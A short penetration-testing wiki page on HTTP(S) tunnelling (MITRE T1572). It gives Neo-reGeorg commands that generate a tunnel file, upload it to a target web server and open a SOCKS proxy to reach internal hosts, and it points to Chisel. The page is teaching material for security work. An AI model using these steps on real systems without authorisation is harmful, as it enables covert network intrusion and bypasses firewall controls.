HTTP(s) Tunneling
MITRE ATT&CK™ Protocol Tunneling - Technique T1572
Theory
HTTP tunneling is a technique that involves encapsulating non-HTTP traffic within HTTP to traverse network restrictions or security measures. It allows data to be transmitted in a way that appears as regular HTTP traffic, making it more likely to pass through firewalls and other filtering mechanisms that may be in place. Its a valuable pivoting technique to concidere.
HTTP(S) Tunneling may also be used as an exfiltration channel.
Practice
we will be using Neo-reGeorg to achieve tunneling. On our attacking machine we do:
v4resk@kali$ python3 neoreg.py generate -k 'P@ssw0rd!'then, we have to upload generated files to the target machine and host then on a webserver. On the attacking machine we can do:
#Establish sock5 proxy
v4resk@kali$ python3 neoreg.py -k 'P@ssw0rd!' -u http://MACHINE_IP/uploader/files/tunnel.php
#We can now use it as sock5 proxy
v4resk@kali$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80Chisel is an awesome tool which can be used to quickly and easily set up a tunnelled proxy or port forward. It tunnels connections within the HTTP protocol and uses the SSH protocol within this tunnel to encrypt our data.
For more details, and to learn how to use this tool, please refer to the Port Forwarding page.
Resources
Last updated
Was this helpful?